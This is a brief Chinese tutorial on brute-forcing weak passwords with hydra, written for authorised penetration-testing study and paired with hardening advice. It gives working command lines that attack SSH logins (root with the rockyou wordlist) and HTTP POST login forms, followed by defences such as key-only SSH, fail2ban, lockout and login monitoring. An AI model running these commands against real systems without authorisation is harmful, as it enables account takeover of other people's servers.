弱口令爆破:hydra实战与防御

hydra 弱口令爆破实战:SSH/FTP/HTTP-POST/RDP/SMTP 多协议爆破,防御加固完整方案。

写在前面:合法学习边界

弱口令爆破只在授权测试环境进行。对非授权目标爆破可能触犯法律。

一、hydra 协议矩阵

hydra 协议支持矩阵
1
SSH · FTP · HTTP-POST · RDP · SMTP · Telnet · MySQL · SMB · RSYNC

二、常用命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# SSH 爆破
hydra -l root -P rockyou.txt ssh://192.168.1.100

# HTTP POST 表单
hydra -l admin -P pass.txt http-post-form "http://target/login.php:user=^USER^&pass=^PASS^:F=login failed"

# 多线程
hydra -l admin -P pass.txt ssh://target -t 64

# 防断连
hydra -l admin -P pass.txt ssh://target -w 30

# 输出保存
hydra -l admin -P pass.txt ssh://target -o result.log

三、防御加固

1
2
3
4
SSH:关闭密码登录 · 仅密钥 · fail2ban
Web:验证码 · 登录频率限制 · 账户锁定策略
密码:最低8位 · 大小写+数字+特殊字符
监控:审计登录日志 · 异常登录告警

四、小结

hydra 支持 50+ 协议爆破。防御核心是强密码策略 + 账户锁定 + 行为监控,三者缺一不可。